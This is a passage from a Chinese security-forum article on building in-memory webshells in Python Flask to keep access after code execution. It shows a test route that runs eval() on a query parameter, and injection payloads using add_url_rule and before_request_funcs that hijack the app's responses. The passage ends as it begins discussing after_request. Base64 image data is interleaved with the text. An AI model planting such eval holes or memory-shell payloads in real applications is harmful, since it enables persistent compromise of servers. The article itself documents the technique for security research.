<!--[if lte IE 8]>
|
|||
|
|
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验,请使用IE10及以上版本</span>
|
|||
|
|
<![endif]-->
|
|||
|
|
<div class=brand-box>
|
|||
|
|
<a class=brand href=https://xz.aliyun.com/tab/1></a>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F14421%3Fu_atoken%3D408583c98d3c33ff2f0f44cb3eb738cf%26u_asession%3D01oib2BtUMe2FXsB5mgb-5KWpfBpg0aB7kHsSD147UFUZ81UvygBm_8ivwc-Zs-Z_7dlmHJsN3PcAI060GRB4YZGyPlBJUEqctiaTooWaXr7I%26u_asig%3D05BssisGG8Ei4348apGffqEtOIzJXnEfJmfjmUSag0uv4_Mdeo4z7ZppbV1Ay2bzLQtgDAtwBJIuwodggTkYqzpCChHzr67OoSq_lrpKJaWbFzktHyor2aTvLvtD025aS8xcwzHVD6-nhy4jLXKQl-Zboaxjm0FgrL7bN1gR9Lc4Fg2QMxYs6lyXb1lFWKql569vtzFx81YCFuUHUUg160WlR6404rUEm5vP7bKjBmNdPSlrUhBeGdMwM10MY-j4ftCC9TI14p0PFW6OVnTKD1etTkd7iI1CG-hb7Kwikd4sI%26u_aref%3DE5KVdHHHshks9dYBOUXEjRSnm8E%253D&from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
|
|||
|
|
登录</a>
|
|||
|
|
|
|||
|
|
<div class="nav-collapse collapse">
|
|||
|
|
<div class="search d1 text-right">
|
|||
|
|
<form action=/search>
|
|||
|
|
<input type=text placeholder=搜索 name=keyword value>
|
|||
|
|
</form>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div id=Wrapper class=container>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class=row2>
|
|||
|
|
<div class=span10>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box content" width="1200px !important" style=width:1200px>
|
|||
|
|
|
|||
|
|
<div class=box-container>
|
|||
|
|
<div class=main-topic>
|
|||
|
|
<div class="clearfix user-info topic-list">
|
|||
|
|
<p><span class=content-title>Python Flask内存马的另辟途径</span>
|
|||
|
|
</p>
|
|||
|
|
<div class=topic-info>
|
|||
|
|
<span class=info-left>
|
|||
|
|
<a href=https://xz.aliyun.com/u/65763>
|
|||
|
|
<span class="username cell"> 1458662274227693</span></a> <span class=i-seprator> / </span>
|
|||
|
|
<span> 2024-05-06 19:36:03</span><span class=i-seprator> / </span>
|
|||
|
|
|
|||
|
|
<span>发表于北美地区 / </span>
|
|||
|
|
|
|||
|
|
<span>浏览数 272</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class=content-node>
|
|||
|
|
|
|||
|
|
<span class="label label-default label-node-first">
|
|||
|
|
<a href=https://xz.aliyun.com/tab/1>技术文章</a></span>
|
|||
|
|
<span class="label label-default">
|
|||
|
|
<a href=https://xz.aliyun.com/node/11>技术文章</a></span>
|
|||
|
|
|
|||
|
|
</span>
|
|||
|
|
</span>
|
|||
|
|
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
|
|||
|
|
顶(1)</a>
|
|||
|
|
<a class="vote vote-down" href=javascript:void(0)>
|
|||
|
|
踩(0)</a></span>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<hr>
|
|||
|
|
<div id=topic_content class="topic-content markdown-body">
|
|||
|
|
<p>最近发现了一个Python Flask框架的后台任意代码执行,利用成功以后想要进一步维持权限,所以想要使用Flask的内存马技术。</p>
|
|||
|
|
<h2 id=toc-0>add_url_rule存在的局限</h2>
|
|||
|
|
<p>在网上浏览了很多文章,似乎都是清一色的介绍如何使用<code>add_url_rule</code>添加路由,但当下的FLask版本似乎已经不再支持在程序运行的过程中通过add_url_rule添加路由了。</p>
|
|||
|
|
<p>测试代码:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=nd>@app.route</span><span class=p>(</span><span class=s1>'/e'</span><span class=p>)</span>
|
|||
|
|
<span class=k>def</span> <span class=nf>e</span><span class=p>():</span>
|
|||
|
|
<span class=n>a</span> <span class=o>=</span> <span class=nb>eval</span><span class=p>(</span><span class=n>request</span><span class=o>.</span><span class=n>args</span><span class=o>.</span><span class=n>get</span><span class=p>(</span><span class=s1>'cmd'</span><span class=p>))</span>
|
|||
|
|
<span class=k>if</span> <span class=n>a</span> <span class=p>:</span>
|
|||
|
|
<span class=k>return</span> <span class=s2>"1"</span>
|
|||
|
|
<span class=k>else</span><span class=p>:</span>
|
|||
|
|
<span class=k>return</span> <span class=s2>"0"</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>访问<code>http://127.0.0.1:5000/e?cmd=app.add_url_rule('/shell','shell',lambda :"123")</code></p>
|
|||
|
|
<p>然而会显示<code>The setup method 'add_url_rule' can no longer be called on the application.</code><br>
|
|||
|
|
<a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20240506192047-afd92de4-0b9a-1.png title><img src="data:image/png;base64,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
|
|||
|
|
<p>所以,我们只能通过其他方式添加路由来处理我们的请求,这里我们可以尝试使用<code>@app.before_request</code></p>
|
|||
|
|
<h2 id=toc-1>before_request</h2>
|
|||
|
|
<p>在 Flask 中,<code>before_request</code> 是一个装饰器,它用于在请求处理之前执行特定的函数。这个装饰器允许对每个请求进行一些预处理,比如认证检查、日志记录、设置响应头等。<br>
|
|||
|
|
<a id=img1 href=https://xzfile.aliyuncs.com/media/upload/picture/20240506192109-bcb858a0-0b9a-1.png><img src="data:image/png;base64,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
|
|||
|
|
通过底层源码可以看到<code>before_request</code>实际上调用的是<code>self.before_request_funcs.setdefault(None, []).append(f)</code>,其意思是:</p>
|
|||
|
|
<ul>
|
|||
|
|
<li>检查 <code>self.before_request_funcs</code> 字典中是否有一个键为 <code>None</code> 的条目。</li>
|
|||
|
|
<li>如果没有 <code>None</code> 键,就在字典中创建它,并将其值设置为一个空列表。</li>
|
|||
|
|
<li>然后,无论 <code>None</code> 键是否存在,都将函数 <code>f</code> 添加到这个列表中。</li>
|
|||
|
|
</ul>
|
|||
|
|
<p>这个函数f就是我们要添加的函数。</p>
|
|||
|
|
<p>当访问<code>http://127.0.0.1:5000/e?cmd=app.before_request_funcs.setdefault(None, []).append(lambda: "123")</code>后,后续所有的访问结果都将变成123<br>
|
|||
|
|
<a id=img2 href=https://xzfile.aliyuncs.com/media/upload/picture/20240506192128-c88394b0-0b9a-1.png><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA8gAAAESCAYAAAAhaPxiAABajUlEQVR4nO3de1xU950//tc5MwMoXmIUNDEOVkOwSFZrSPtNYhHsJvj9lk1bVNSwJftIv1tzpQ2tMdmkZUyTNYlb0hJt4v5200prVTRkm6WPFW0VaTRtJDF+g1REqYwxImiMF1Tmcs7vj5lzOHPmzI0ZGC6v5+PBQ+dcP+d+3udzE2RZlkFEREREREQ0wonxTgARERERERHRYMAAmYiIiIiIiAgMkImIiIiIiIgAMEAmIiIiIiIiAsAAmYiIiIiIiAgAA2QiIiIiIiIiAAyQiYiIiIiIiAD0JUA+vBozhQL8xmjcbwogCILmbyZWHzaaTPCZrsBwYUREREREREQDJ4IA+TcoEAQIc19BW6Dx3/4rnvpIhix7/j56Cnhlrm8AfHj1TGxdrp1mBn7/bQbJREREREREFF/hBci/KYAgbMVyb0Br7B9RK5/Ay3N6h8x5uQZPzQB+v/U3mmEnUPuP2mnW4OsA/vqxQVYzERERERER0QAxhzXVP9ZC9ga1DGOJiIiIiIhoOOrnRro+xpE2YMbs2wNO8ZuCb+P3M55CjTbrmYiIiIiIiGiA9WOAfBirZ34bv8cMLHlgjm54bwNd5bM/gnziZTA8JiIiIiIionjqpwD5NygQ5uKVNuDrv/atlwzMwcsnehvpqkEhW7ImIiIiIiKiuIt5gHx49UwIgifn+KmPZJ8GuYzMefkEfv114Pflq1m/mYiIiIiIiOImpgHy4dUzMdeTbQxZ1uccB3b77BlA2xF8HMvEEBEREREREUUgdgHy4dUofKUNM576CHKobGOdjz0teSFwU15ERERERERE/StmAfLh3+5AG76ONUGzjX+Dgpm+RakPr56Jb/8e+PoaNtRFRERERERE8RPjOsi/x7eF3haqe/9mYvVhAPhH1NYAhZpxc1/5In4th66rTERERERERNSfBFmW5XgngoiIiIiIiCje+rEfZCIiIiIiIqKhgwEyERERERERERggExEREREREQFggExEREREREQEgAEyEREREREREQAGyEREREREREQAGCATERERERERAWCATERERERERASAATIRERERERERAAbIRERERERERAAYIBMREREREREBYIBMREREREREBIABMhEREREREREABshEREREREREABggExEREREREQFggExEREREREQEgAEyEREREREREQAGyEREREREREQAGCATERERERERAWCATERERERERASAATIRERERERERAAbIRERERERERAAYIBMREREREREBYIBMREREREREBIABMhEREREREREABshEREREREREABggExEREREREQFggExEREREREQEADC3t5+KdxqIiIiIiIiI4k7o6XHI8U4EERERERENHRPWWeKdhGHnwipnvJNAYBFrIiIiIiIiIgDMQSYiIiIiIiICwBxkIiIiIiIiIgCDIEDu6OiIdxKIiIiIiIiI4h8gExEREREREQ0G5ngnIFo7duwAACxZsiTOKSEiov7S0dGBmpq3cPz4cRw+fBgAMGfOHNx6660oLFyMKVOmxDmFFAsbNqzH/v0HcPZs8NJlkydPQX5+Ph588MEBStnAam1tRVVVFQCgpKQE6enpcU4RUd9JkgRRFOGGG38+dADvvt+A02c93cxab5mOr35lAb4y+y51ehkyBAjxSi5ReI10hfvAUkTy4Oro6IjqxWbTpk0AMGwfkpHqz2NFI1dZ2ZMAgIqKVw3Hf/e7/wxBELBx478PZLL61eXLl1FTU4MDB/bj+PHjeP7553HPPfMBAPv3v4sf//jHuPXWW3H33ffw+ulnGzasR01NTdBpFi9ejEcffWyAUjRwAt3Th+O9O5zjrFdS8uCw2geKFStWoLPzLADPsf7tb38b5xQNf7/85S/xq1/9CgDwne98ByUlJWEPo8BOXbTjlvHT0NzShDUv/wiNh/+CUSmjMWpiEmQZuNZ5FWKiCf97+f/B/V9djLut82ESTZBlGYLAIJniI2QOcl8eWGfPdqCqKvaB6+XLl/HKK6/gwIH9fuOU9QHA3Xffg6eeegpjx46N2bqHgsF0rAazYOeR3qpVT2HRokUDkKrBa9OmTWqO3aZNmwzPkxMnTgx0svpdVdWmkNfT8ePHcfz4cVy5chmPPfb4AKVsZCkrexKHDx9GcnIy7rlnPvLz8zF37lwAnly2XbvqUFNTg7fe8uQuB/qIMxQFu6cPx3t3XV0dAOCNNzaGzDFtbW3Fww+vRF1d3bDZfq3u7ivq/69cuRzHlIwcmzZtwr59+wAACxYsQElJSdjDIlFdvR01NTXYunVLbDdgEHLJblS+U4H0G27Df7z5Bq5e70b6N9Nx4djnMCWaIIgCpOsSrn12De++24C/SSfwh9SdeOreZ5FsHhPv5NMIFrIOsvaB9cc/7gnr7403NvrMGyvl5T8OK6g5cGA/Xn755T6to7p6O2y2NQHHT5w4Maw/xbx583yGK8vXDps3b16f0qrXn8eqqakJy5ev8BsWKu3B9ue8efPQ1NRkuK5Y7RMj4Z5HALBu3SvYuXNn2MvWHvtg50d19fag+0bZB/PmzUN19XZ1+ECeT4Anp1T78amqahP273836uVGeh0p82gFOn9iRX89KbnHAHDPPfN9rp9du3aFvVztdthsa3zOgVD3H+001dXb/faJfvnaYYH21fLlK9Rx+vMrnvczwBMgKsHxT39agdWrV6vBMQCkp6fjsccexxtvbERycjIOHz6MDRvWh1xuoHuMsl+N6K9F7T2xqalJ3R+xFOyeHovnbLDt1VK2r791d3cDQFjFiZVpwi0tBUS2HfPmzcPy5St89k+4+ysWSkoeNPx/JJYvXxHyHqucw8r9xOjeq71HBBPs/qFPi/6+ob+vKGkyuh8Gu59FQ5b9C1SGOywSRUVLsXv3roDbEGzfBDpGyrlts60JeR/Xq67e3m/vXNd7ruHYiaPYcXgrUnJSMGvpF+F2uuF2uWEabYJgFjDmlmSMmjQKn757Bq3Vx/Hh8YP4tz1r8XnP5/2SplASV57GR3ZnXNZNg0fIHORIHliKvjy4wqHkYv3Xf/0uYO7w5cuX8c1vfgPvvXcg5PKqq7fjkUceNhz32muVPr+feKIUNls5zp8/7zN8+fIVeO65Z5GVlRVwPco82hu9sjwAMbsxDfSxysrKwm23ZXhf8st9xinbmpmZ6TffvHnz8OGHHxous6mpCQsWLPDbz7EUznkEeL4mV1Vtwuuv/wIzZ84Ma7+eP38eEydOxPnz55GWlqZup3ablReSoqKlWL58heH+A4DbbsvA1q1bMG/ePGRmflE9xwbqfOro6MArr7ziN/yVV17Bxo23RlU1QrtvAtFuh822Bq+//obP7/b2dixYsMBnnlieN+FcT8q4K1euBJwmGJut3OclPJJchaKipQA855MyT3X1djzxRCkA/0BZu69ef/0Ndf5jx1p87l/79u3z+a0/nwby/FNyT3/604qQx+GnP63Aww+vRE1NDRYvXhLR+bl8+QoUFhYGHV9VVYWsrCz1+gaA3bt3YeLEiUhLS4vZuXf58mWUl/8YHR1ng56D2nv3Aw88gJkzZ8a05NTy5Suwe7fvh59AL9nhXM99pS1qnJo6GVu2RJbrFs12aO+/2uvnpZfW4umnn0Fzc7PhvTsWlixZgvz8fADo8zHV30vmzZunnsdGlOt43rx5sNnW+LwHafehco/Rjk9LSwMQ+P6hpEX7LFT2XXX19pD7Un8ctcdDv86++s53vqMu97vfXRnRsGD0+1Khf35p76Pa/zc1NeGFF170OZ7KftUuW7kHvfPO7/zuR9pz3uia0E8DxOa6/uRzO6QkF0SXiJ4LPei52INr567DMtoCd48bCeMS4Ox2wJRowtjpY+HoceD8//sM/2/sIbz/twO4b9b/CbjsjGc78FzB
|
|||
|
|
可见通过<code>before_request</code>添加内存马这一条路是可行的,但同样会有一点问题,就是使用lambda必然会得到一个返回值,那么服务后续的操作都无法进行,会影响到主机的正常业务。</p>
|
|||
|
|
<h2 id=toc-2>after_request</h2>
|
|||
|
|
<p>针对这个问题,我们可以使用<code>@app.after_request</code>来解决,与<code>@app.before_request</code>类似,<code>after_request</code>会在请求结束得到响应包之后进行操作,查看底层源码可以看到其调用方法和<code>before_request</code>类似<br>
|
|||
|
|
